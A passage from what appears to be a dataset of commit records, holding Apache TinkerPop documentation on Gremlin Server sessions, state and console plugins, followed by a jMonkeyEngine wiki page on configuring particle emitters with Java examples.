to the\nserver that the session was initialized in. Gremlin Server does not share session state as the transactional context\nof a `Graph` is bound to the thread it was initialized in.\n\nTo connect to a session with Java via the `gremlin-driver`, it is necessary to create a `SessionedClient` from the\n`Cluster` object:\n\n[source,java]\n----\nCluster cluster = Cluster.open(); <1>\nClient client = cluster.connect(\"sessionName\"); <2>\n----\n\n<1> Opens a reference to `localhost` as <<connecting-via-java,previously shown>>.\n<2> Creates a `SessionedClient` given the configuration options of the Cluster. The `connect()` method is given a\n`String` value that becomes the unique name of the session. It is often best to simply use a `UUID` to represent\nthe session.\n\nIt is also possible to have Gremlin Server manage the transactions as is done with sessionless requests. The user is\nin control of enabling this feature when creating the `SessionedClient`:\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect(\"sessionName\", true);\n----\n\nSpecifying `true` to the `connect()` method signifies that the `client` should make each request as one encapsulated\nin a transaction. With this configuration of `client` there is no need to close a transaction manually.\n\nWhen using this mode of the `SessionedClient` it is important to recognize that global variable state for the session\nis not rolled-back on failure depending on where the failure occurs. For example, sending the following script would\ncreate a variable \"x\" in global session scope that would be acccessible on the next request:\n\n[source,groovy]\nx = 1\n\nHowever, sending this script which explicitly throws an exception:\n\n[source,groovy]\ny = 2\nthrow new RuntimeException()\n\nwill result in an obvious failure during script evaluation and \"y\" will not be available to the next request. The\ncomplication arises where the script evaluates successfully, but fails during result iteration or serialization. For\nexample, this script:\n\n[source,groovy]\na = 1\ng.addV()\n\nwould sucessfully evaluate and return a `Traversal`. The variable \"a\" would be available on the next request. However,\nif there was a failure in transaction management on the call to `commit()`, \"a\" would still be available to the next\nrequest.\n\nA session is a \"heavier\" approach to the simple \"request\/response\" approach of sessionless requests, but is sometimes\nnecessary for a given use case.\n\n[[considering-transactions]]\nConsidering Transactions\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nGremlin Server performs automated transaction handling for \"sessionless\" requests (i.e. no state between requests) and\nfor \"in-session\" requests with that feature enabled. It will automatically commit or rollback transactions depending\non the success or failure of the request.\n\nAnother aspect of Transaction Management that should be considered is the usage of the `strictTransactionManagement`\nsetting. It is `false` by default, but when set to `true`, it forces the user to pass `aliases` for all requests.\nThe aliases are then used to determine which graphs will have their transactions closed for that request. Running\nGremlin Server in this configuration should be more efficient when there are multiple graphs being hosted as\nGremlin Server will only close transactions on the graphs specified by the `aliases`. Keeping this setting `false`,\nwill simply have Gremlin Server close transactions on all graphs for every request.\n\n[[considering-state]]\nConsidering State\n^^^^^^^^^^^^^^^^^\n\nWith REST and any sessionless requests, there is no variable state maintained between requests. Therefore,\nwhen <<connecting-via-console,connecting with the console>>, for example, it is not possible to create a variable in\none command and then expect to access it in the next:\n\n[source,groovy]\n----\ngremlin> :remote connect tinkerpop.server conf\/remote.yaml\n==>Configured localhost\/127.0.0.1:8182\ngremlin> :> x = 2\n==>2\ngremlin> :> 2 + x\nNo such property: x for class: Script4\nDisplay stack trace? [yN] n\n----\n\nThe same behavior would be seen with REST or when using sessionless requests through one of the Gremlin Server drivers.\nIf having this behavior is desireable, then <<sessions,consider sessions>>.\n\nThere is an exception to this notion of state not existing between requests and that is globally defined functions.\nAll functions created via scripts are global to the server.\n\n[source,groovy]\n----\ngremlin> :> def subtractIt(int x, int y) { x - y }\n==>null\ngremlin> :> subtractIt(8,7)\n==>1\n----\n\nIf this behavior is not desirable there are several options. A first option would be to consider using sessions. Each\nsession gets its own `ScriptEngine`, which maintains its own isolated cache of global functions, whereas sessionless\nrequests uses a single function cache. A second option would be to define functions as closures:\n\n[source,groovy]\n----\ngremlin> :> multiplyIt = { int x, int y -> x * y }\n==>Script7$_run_closure1@6b24f3ab\ngremlin> :> multiplyIt(7, 8)\nNo signature of method: org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.multiplyIt() is applicable for argument types: (java.lang.Integer, java.lang.Integer) values: [7, 8]\nDisplay stack trace? [yN]\n----\n\nWhen the function is declared this way, the function is viewed by the `ScriptEngine` as a variable rather than a global\nfunction and since sessionless requests don't maintain state, the function is forgotten for the next request. A final\noption would be to manage the `ScriptEngine` cache manually:\n\n[source,bourne]\n----\n$ curl -X POST -d \"{\\\"gremlin\\\":\\\"def divideIt(int x, int y){ x \/ y }\\\",\\\"bindings\\\":{\\\"#jsr223.groovy.engine.keep.globals\\\":\\\"phantom\\\"}}\" \"http:\/\/localhost:8182\"\n{\"requestId\":\"97fe1467-a943-45ea-8fd6-9e889a6c9381\",\"status\":{\"message\":\"\",\"code\":200,\"attributes\":{}},\"result\":{\"data\":[null],\"meta\":{}}}\n$ curl -X POST -d \"{\\\"gremlin\\\":\\\"divideIt(8, 2)\\\"}\" \"http:\/\/localhost:8182\"\n{\"message\":\"Error encountered evaluating script: divideIt(8, 2)\"}\n----\n\nIn the above REST-based requests, the bindings contain a special parameter that tells the `ScriptEngine` cache to\nimmediately forget the script after execution. In this way, the function does not end up being globally available.\n\n[[gremlin-plugins]]\nGremlin Plugins\n---------------\n\nimage:gremlin-plugin.png[width=125]\n\nPlugins provide a way to expand the features of Gremlin Console and Gremlin Server. The following sections describe\nthe plugins that are available directly from TinkerPop. Please see the\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/dev\/provider\/#gremlin-plugins[Provider Documentation] for information on\nhow to develop custom plugins.\n\n[[credentials-plugin]]\nCredentials Plugin\n~~~~~~~~~~~~~~~~~~\n\nimage:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] supports an authentication model\nwhere user credentials are stored inside of a `Graph` instance. This database can be managed with the\nxref:credentials-dsl[Credentials DSL], which can be installed in the console via the Credentials Plugin. This plugin\nis packaged with the console, but is not enabled by default.\n\n[source,groovy]\ngremlin> :plugin use tinkerpop.credentials\n==>tinkerpop.credentials activated\n\nThis plugin imports the appropriate classes for managing the credentials graph.\n\n[[gephi-plugin]]\nGephi Plugin\n~~~~~~~~~~~~\n\nimage:gephi-logo.png[width=200, float=left] link:http:\/\/gephi.github.io\/[Gephi] is an interactive visualization,\nexploration, and analysis platform for graphs. The link:https:\/\/marketplace.gephi.org\/plugin\/graph-streaming\/[Graph Streaming]\nplugin for Gephi provides an link:https:\/\/wiki.gephi.org\/index.php\/Graph_Streaming[API] that can be leveraged to\nstream graphs and visualize traversals interactively through the Gremlin Gephi Plugin.\n\nThe following instructions assume that Gephi has been download and installed. It further assumes that the Graph\nStreaming plugin has been installed (`Tools > Plugins`). The following instructions explain how to visualize a `Graph`\nand `Traversal`.\n\nIn Gephi, create a new project with `File > New Project`. In the lower left view, click the \"Streaming\" tab, open the\nMaster drop down, and right click `Master Server > Start` which starts the Graph Streaming server in Gephi and by\ndefault accepts requests at `http:\/\/localhost:8080\/workspace0`:\n\nimage::gephi-start-server.png[width=800]\n\nIMPORTANT: The Gephi Streaming Plugin doesn't detect port conflicts and will appear to start the plugin successfully\neven if there is something already active on that port it wants to connect to (which is 8080 by default). Be sure\nthat there is nothing running on the port before Gephi will be using before starting the plugin. Failing to do\nthis produce behavior where the console will appear to submit requests to Gephi successfully but nothing will\nrender.\n\nStart the xref:gremlin-console[Gremlin Console] and activate the Gephi plugin:\n\n[gremlin-groovy]\n----\n:plugin use tinkerpop.gephi\ngraph = TinkerFactory.createModern()\n:remote connect tinkerpop.gephi\n:> graph\n----\n\nThe above Gremlin session activates the Gephi plugin, creates the \"modern\" `TinkerGraph`, uses the `:remote` command\nto setup a connection to the Graph Streaming server in Gephi (with default parameters that will be explained below),\nand then uses `:submit` which sends the vertices and edges of the graph to the Gephi Streaming Server. The resulting\ngraph appears in Gephi as displayed in the left image below.\n\nimage::gephi-graph-submit.png[width=800]\n\nNOTE: Issuing `:> graph` again will clear the Gephi workspace and then re-write the graph. To manually empty the\nworkspace do `:> clear`.\n\nNow that the graph is visualized in Gephi, it is possible to link:https:\/\/gephi.github.io\/users\/tutorial-layouts\/[apply a layout algorithm],\nchange the size and\/or color of vertices and edges, and display labels\/properties of interest. Further information\ncan be found in Gephi's tutorial on link:https:\/\/gephi.github.io\/users\/tutorial-visualization\/[Visualization].\nAfter applying the Fruchterman Reingold layout, increasing the node size, decreasing the edge scale, and displaying\nthe id, name, and weight attributes the graph looks as displayed in the right image above.\n\nVisualization of a `Traversal` has a different approach as the visualization occurs as the `Traversal` is executing,\nthus showing a real-time view of its execution. A `Traversal` must be \"configured\" to operate in this format and for\nthat it requires use of the `visualTraversal` option on the `config` function of the `:remote` command:\n\n[gremlin-groovy,modern]\n----\n:remote config visualTraversal graph <1>\ntraversal = vg.V(2).in().out('knows').\n has('age',gt(30)).outE('created').\n has('weight',gt(0.5d)).inV();null\n:> traversal <2>\n----\n\n<1> Configure a \"visual traversal\" from your \"graph\" - this must be a `Graph` instance.\n<2> Submit the `Traversal` to visualize to Gephi.\n\nWhen the `:>` line is called, each step of the `Traversal` that produces or filters vertices generates events to\nGephi. The events update the color and size of the vertices at that step with `startRGBColor` and `startSize`\nrespectively. After the first step visualization, it sleeps for the configured `stepDelay` in milliseconds. On the\nsecond step, it decays the configured `colorToFade` of all the previously visited vertices in prior steps, by\nmultiplying the current `colorToFade` value for each vertex with the `colorFadeRate`. Setting the `colorFadeRate`\nvalue to `1.0` will prevent the color decay. The screenshots below show how the visualization evolves over the four\nsteps:\n\nimage::gephi-traversal.png[width=1200]\n\nTo get a sense of how the visualization configuration parameters affect the output, see the example below:\n\n[gremlin-groovy,modern]\n----\n:remote config startRGBColor [0.0,0.3,1.0]\n:remote config colorToFade b\n:remote config colorFadeRate 0.5\n:> traversal\n----\n\nimage::gephi-traversal-config.png[width=400]\n\nThe visualization configuration above starts with a blue color now (most recently visited), fading the blue color\n(so that dark green remains on oldest visited), and fading the blue color more quickly so that the gradient from dark\ngreen to blue across steps has higher contrast. The following table provides a more detailed description of the\nGephi plugin configuration parameters as accepted via the `:remote config` command:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Parameter |Description |Default\n|workspace |The name of the workspace that your Graph Streaming server is started for. |workspace0\n|host |The host URL where the Graph Streaming server is configured for. |localhost\n|port |The port number of the URL that the Graph Streaming server is listening on. |8080\n|sizeDecrementRate |The rate at which the size of an element decreases on each step of the visualization. |0.33\n|stepDelay |The amount of time in milliseconds to pause between step visualizations. |1000\n|startRGBColor |A size 3 float array of RGB color values which define the starting color to update most recently visited nodes with. |[0.0,1.0,0.5]\n|startSize |The size an element should be when it is most recently visited. |20\n|colorToFade |A single char from the set `{r,g,b,R,G,B}` determining which color to fade for vertices visited in prior steps |g\n|colorFadeRate |A float value in the range `(0.0,1.0]` which is multiplied against the current `colorToFade` value for prior vertices; a `1.0` value effectively turns off the color fading of prior step visited vertices |0.7\n|visualTraversal |Creates a `TraversalSource` variable in the Console named `vg` which can be used for visualizing traversals. This configuration option takes two parameters. The first is required and is the name of the `Graph` instance variable that will generate the `TraversalSource`. The second parameter is the variable name that the `TraversalSource` should have when referenced in the Console. If left unspecified, this value defaults to `vg`.\n|=========================================================\n\n[[server-plugin]]\nServer Plugin\n~~~~~~~~~~~~~\n\nimage:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] remotely executes Gremlin scripts\nthat are submitted to it. The Server Plugin provides a way to submit scripts to Gremlin Server for remote\nprocessing. Read more about the plugin and how it works in the Gremlin Server section on xref:connecting-via-console[Connecting via Console].\n\nNOTE: The Server Plugin is enabled in the Gremlin Console by default.\n\n[[sugar-plugin]]\nSugar Plugin\n~~~~~~~~~~~~\n\nimage:gremlin-sugar.png[width=120,float=left] In previous versions of Gremlin-Groovy, there were numerous\nlink:http:\/\/en.wikipedia.org\/wiki\/Syntactic_sugar[syntactic sugars] that users could rely on to make their traversals\nmore succinct. Unfortunately, many of these conventions made use of link:http:\/\/docs.oracle.com\/javase\/tutorial\/reflect\/[Java reflection]\nand thus, were not performant. In TinkerPop3, these conveniences have been removed in support of the standard\nGremlin-Groovy syntax being both inline with Gremlin-Java8 syntax as well as always being the most performant\nrepresentation. However, for those users that would like to use the previous syntactic sugars (as well as new ones),\nthere is `SugarGremlinPlugin` (a.k.a Gremlin-Groovy-Sugar).\n\nIMPORTANT: It is important that the sugar plugin is loaded in a Gremlin Console session prior to any manipulations of\nthe respective TinkerPop3 objects as Groovy will cache unavailable methods and properties.\n\n[source,groovy]\n----\ngremlin> :plugin use tinkerpop.sugar\n==>tinkerpop.sugar activated\n----\n\nTIP: When using Sugar in a Groovy class file, add `static { SugarLoader.load() }` to the head of the file. Note that\n`SugarLoader.load()` will automatically call `GremlinLoader.load()`.\n\nGraph Traversal Methods\n^^^^^^^^^^^^^^^^^^^^^^^\n\nIf a `GraphTraversal` property is unknown and there is a corresponding method with said name off of `GraphTraversal`\nthen the property is assumed to be a method call. This enables the user to omit `( )` from the method name. However,\nif the property does not reference a `GraphTraversal` method, then it is assumed to be a call to `values(property)`.\n\n[gremlin-groovy,modern]\n----\ng.V <1>\ng.V.name <2>\ng.V.outE.weight <3>\n----\n\n<1> There is no need for the parentheses in `g.V()`.\n<2> The traversal is interpreted as `g.V().values('name')`.\n<3> A chain of zero-argument step calls with a property value call.\n\nRange Queries\n^^^^^^^^^^^^^\n\nThe `[x]` and `[x..y]` range operators in Groovy translate to `RangeStep` calls.\n\n[gremlin-groovy,modern]\n----\ng.V[0..2]\ng.V[0..<2]\ng.V[2]\n----\n\nLogical Operators\n^^^^^^^^^^^^^^^^^\n\nThe `&` and `|` operator are overloaded in `SugarGremlinPlugin`. When used, they introduce the `AndStep` and `OrStep`\nmarkers into the traversal. See <<and-step,`and()`>> and <<or-step,`or()`>> for more information.\n\n[gremlin-groovy,modern]\n----\ng.V.where(outE('knows') & outE('created')).name <1>\nt = g.V.where(outE('knows') | inE('created')).name; null <2>\nt.toString()\nt\nt.toString()\n----\n\n<1> Introducing the `AndStep` with the `&` operator.\n<2> Introducing the `OrStep` with the `|` operator.\n\nTraverser Methods\n^^^^^^^^^^^^^^^^^\n\nIt is rare that a user will ever interact with a `Traverser` directly. However, if they do, some method redirects exist\nto make it easy.\n\n[gremlin-groovy,modern]\n----\ng.V().map{it.get().value('name')} \/\/ conventional\ng.V.map{it.name} \/\/ sugar\n----\n\n[[utilities-plugin]]\nUtilities Plugin\n~~~~~~~~~~~~~~~~\n\nThe Utilities Plugin provides various functions, helper methods and imports of external classes that are useful in the console. \n\nNOTE: The Utilities Plugin is enabled in the Gremlin Console by default.\n\n[[benchmarking-and-profiling]]\nBenchmarking and Profiling\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe link:https:\/\/code.google.com\/p\/gperfutils\/[GPerfUtils] library provides a number of performance utilities for\nGroovy. Specifically, these tools cover benchmarking and profiling.\n\nBenchmarking allows execution time comparisons of different pieces of code. While such a feature is generally useful,\nin the context of Gremlin, benchmarking can help compare traversal performance times to determine the optimal\napproach. Profiling helps determine the parts of a program which are taking the most execution time, yielding\nlow-level insight into the code being examined.\n\n[gremlin-groovy,modern]\n----\n:plugin use tinkerpop.sugar \/\/ Activate sugar plugin for use in benchmark\nbenchmark{\n 'sugar' {g.V(1).name.next()}\n 'nosugar' {g.V(1).values('name').next()}\n}.prettyPrint()\nprofile { g.V().iterate() }.prettyPrint()\n----\n\n[[describe-graph]]\nDescribe Graph\n^^^^^^^^^^^^^^\n\nA good implementation of the Gremlin APIs will validate their features against the xref:validating-with-gremlin-test[Gremlin test suite].\nTo learn more about a specific implementation's compliance with the test suite, use the `describeGraph` function.\nThe following shows the output for `HadoopGraph`:\n\n[gremlin-groovy,modern]\n----\ndescribeGraph(HadoopGraph)\n----\n\n[[gremlin-archetypes]]\nGremlin Archetypes\n------------------\n\nTinkerPop has a number of link:https:\/\/maven.apache.org\/guides\/introduction\/introduction-to-archetypes.html[Maven archetypes],\nwhich provide example project templates to quickly get started with TinkerPop. The available archetypes are as follows:\n\n* `gremlin-archetype-server` - An example project that demonstrates the basic structure of a\n<<gremlin-server,Gremlin Server>> project, how to connect with the Gremlin Driver, and how to embed Gremlin Server in\na testing framework.\n* `gremlin-archetype-tinkergraph` - A basic example of how to structure a TinkerPop project with Maven.\n\nYou can use Maven to generate these example projects with a command like:\n\n[source,shell]\n$ mvn archetype:generate -DarchetypeGroupId=org.apache.tinkerpop -DarchetypeArtifactId=gremlin-archetype-server\n -DarchetypeVersion=x.y.z -DgroupId=com.my -DartifactId=app -Dversion=0.1 -DinteractiveMode=false\n\nThis command will generate a new Maven project in a directory called \"app\" with a `pom.xml` specifying a `groupId` of\n`com.my`. Please see the `README.asciidoc` in the root of each generated project for information on how to build and\nexecute it.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"82332fbadde9b58d4d14835432584ecc47a43617","subject":"fix image","message":"fix image\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/effect\/particles\/particles.adoc","new_file":"docs\/modules\/contributions\/pages\/effect\/particles\/particles.adoc","new_contents":"= Next Generation Particle Emitters\n:revnumber: 2.0\n:revdate: 2020\/07\/25\n\n\nThis is a new particle system for jME3 posted for review and comments. This is an opportunity for people to comment on and request changes to the +++<abbr title=\"Application Programming Interface\">API<\/abbr>+++ or the internal functionality of the system.\nThe code for this particle system can be found link:https:\/\/github.com\/jMonkeyEngine-Contributions\/ParticleController[jMonkeyEngine-Contributions]\n\nApologies for the slight jitter in some of the videos, the VideoRecorderState seems to be causing some issues which are not present when the application is running normally.\n\n\n== Credits\n\nThese particle emitters are inspired by and use some code from t0neg0ds particle emitters as described link:http:\/\/hub.jmonkeyengine.org\/t\/influencer-based-particleemitter-candidate-mesh-based-animated-particles\/25831[here]\n\nThose in turn were based on the original jME3 particle system by Kirill Vainer\n\n\n== The Big Picture\n\nThe core of all Particle Emitters is a ParticleController. That is used to manage all of the particles, the behaviour of the particles themselves though is controlled though a number of other classes that are plugged in to the ParticleController to provide the required functionality. You can think of the ParticleController as providing the central hub into which you plug all the modules you need to get the desired behaviour.\n\nAn easy way to see what you need is to create a new ParticleController and then look at the constructor, you can see what parameters need to be supplied there.\n[cols=\"2\", options=\"header\"]\n|===\n\na| name\na| The name to use for the geometry in the scene graph\n\na| mesh\na| The mesh to use (Usually either PointMesh or QuadMesh)\n\na| maxParticles\na| The maximum number of particles to allow active at any one time\n\na| lifeMin\na| The minimum amount of time (in seconds) for which each particle lives\n\na| lifeMax\na| The maximum amount of time (in seconds) for which each particle lives\n\na| source\na| The source from which the particles are spawned\n\na| emissionController\na| The frequency and timing with which particles are spawned. If null then no particles are automatically spawned and they must be triggered manually using emitNextParticle() or emitAllParticles()\n\na| influencers\na| Zero or more ParticleInfluencers, each of which changes the behaviour of the particles.\n\n|===\n\nBy selecting the behaviour you desire for each option you can configure up a virtually infinite array of possible particle emitters.\n\nWe will now walk through some common examples and possible uses, and then in the end we will document all of the possible choices for these options.\n\nFor a full reference of the standard options available see the xref:effect\/particles\/reference.adoc[Reference Page].\n\n\n== Simple Fire\n\n[source,java]\n----\n\n\npublic class HelloParticles1_SimpleFire extends SimpleApplication {\n\n public static void main(String[] args){\n HelloParticles1_SimpleFire app = new HelloParticles1_SimpleFire();\n app.start(); \/\/ start the game\n }\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 32 particles at any time\n 32,\n\/\/ Particles last for at least 2 seconds\n 2,\n\/\/ And at most 3 seconds\n 3,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a radius of 0.1\n new SizeInfluencer(0.5f, 0.1f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new ColorInfluencer(new ColorRGBA(1,1,0.2f,1), new ColorRGBA(1,0,0,0.1f)),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n}\n\n----\n\nRun that and the result should look something like:\n\nimage:effect\/particles\/particles1.jpg[particles1.jpg,width=\"\",height=\"\"]\n\n\n== Simple Fire and Smoke\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 50 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 50,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a radius of 0.1\n new SizeInfluencer(0.5f, 0.25f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.15f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.3f, new ColorRGBA(1f, 1f, 1f, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n\n----\n\nYou can see that the only change is to make the particles last a little longer and to change the ColorInfluencer for a MultiColorInfluencer, and yet the results look quite different:\n\nimage:effect\/particles\/particles1.jpg[particles2.jpg,width=\"\",height=\"\"]\n\nThis isn't a very convincing fire yet, but it is very simple to get up and running. One problem with this approach is that particles are done using an alpha-additive material, they can only make things brighter but never darker. That is not ideal for smoke which should be able to make them darker too. We will look at this again later but for now we will move on to some different mesh types.\n\n\n== Quad Meshes and Billboarding\n\nPoint Meshes are extremely fast, but they have a number of limitations. The main ones being that the sprites must always be facing towards the screen and that on certain graphics cards the maximum number of pixels a sprite can occupy on the screen is limited.\n\nWhile PointMesh is recommended for basic particles for more advanced options there is the QuadMesh, this constructs each particle using a quad and as a result can allow any size on the screen and any orientation. The following example combines two separate particle emitters to produce a spell-like effect.\n\n\n[NOTE]\n====\n\nThe flame image from before is used for the second emitter, the first emitter uses this image which you can download and use:\n\nimage:effect\/particles\/runecircle.png[runecircle.png,width=\"256\",height=\"\"]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController to provide the actual spell runes effect\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellRunes\",\n\/\/ Use a Quad Mesh, this image is available for download on this page. The texture file contains\n\/\/ a single image so there are no sprite columns and rows to set up. The BillboardStrategy is how\n\/\/ the particles should be oriented, in this case it uses the particle rotation.\n new QuadMesh(QuadMeshBillboardStrategy.USE_PARTICLE_ROTATION, assetManager, \"Textures\/runeCircle.png\"),\n\/\/ Allow at most 9 particles at any time\n 9,\n\/\/ Particles always last for 4 seconds\n 4,\n 4,\n\/\/ We want to generate all particles from the same location with the same velocity.\n new PointSource(new Vector3f(0, 1f, 0), new Vector3f(0, 1f, 0)),\n\/\/ Emit particles at regular intervals, 4 particles every second\n new RegularEmission(2),\n\/\/ ** Influencers start here\n\/\/ These particles should be size 3 and stay the same size\n new SizeInfluencer(3, 3),\n\/\/ Start the particles at full opacity blue and then fade them out to 0 opacity cyan.\n new ColorInfluencer(ColorRGBA.Blue, new ColorRGBA(0, 1, 1, 0)),\n\/\/ Rotate all particles by the same amount. The units are radians-per-second\n new RotationInfluencer(\n new Vector3f(0, FastMath.QUARTER_PI, 0),\n new Vector3f(0, FastMath.QUARTER_PI, 0), false));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n\/\/ Construct a new ParticleController to provide the central glow effect\n pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellBase\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 76 particles at any time\n 76,\n\/\/ Particles last for at least 5 seconds\n 5,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-1f, 0, -1f), new Vector3f(1f, 0.5f, 1f)),\n\/\/ Emit particles at regular intervals, 15 particles every second\n new RegularEmission(15),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start red with some blue and green and fade towards blue zero opacity\n\/\/ Because particles are rendered using an additive blend then any area where a lot\n\/\/ of particles overlap will end up white.\n new ColorInfluencer(new ColorRGBA(1,0.25f,0.25f,0.25f), new ColorRGBA(0,0,1,0f)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n cam.setLocation(new Vector3f(0, 10, -10));\n cam.lookAt(Vector3f.ZERO, Vector3f.UNIT_Y);\n }\n\n\n----\n\nThe result should look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=_Spjqag99HY[Video: Particle Emitter Example 1]\n\n\n== Using a mesh as the particle source\n\nThere is a model of a monkeys head in the test data that is used in this example, although you can use any other model you like. Just make sure you can find the geometry within the model for the next step.\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n Node monkey = (Node) assetManager.loadModel(\"Models\/MonkeyHead\/MonkeyHead.mesh.xml\");\n rootNode.attachChild(monkey);\n\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.88f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n AmbientLight al = new AmbientLight();\n al.setColor(ColorRGBA.White);\n rootNode.addLight(al);\n...\n}\n----\n\nThe result should look something like:\n\nimage:effect\/particles\/particles1.jpg[particles3.jpg,width=\"\",height=\"\"]\n\nNow lets set fire to the monkey! (No monkeys were harmed during the making of this particle system!).\n\n[source,java]\n----\n\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 1200 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 1200,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ A MeshSource scans a geometry and picks a random point on the surface of that\n\/\/ geometry in order to emit the particle from it. The particle has an inital velocity\n\/\/ of 1wu\/s along the normal of the triangle from which it is emitted.\n new MeshSource(g),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(240),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.1 units, end with a size of 0.15\n new SizeInfluencer(0.1f, 0.15f),\n\/\/ Particles have a constant speed of 0.25f, this will modify the original speed\n\/\/ from the emitter and then allow the GravityInfluencer to change the direction\n\/\/ of motion but constrain the speed\n new SpeedInfluencer(0.25f, 0.25f),\n\/\/ Fade the paticles through a range of colours\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.25f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(1f, 1f, 1f, 0.25f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new GravityInfluencer(new Vector3f(0, 0.5f, 0)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nAgain this is just a very simple example, much more sophisticated fire effects are possible with the use of the right textures and mixture of emitters and influencers. The result though should look something like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=W__zGJHZ2AU[Video: Particle Emitter Example 2]\n\n\n== Meshes and Weighted Meshes\n\nThe 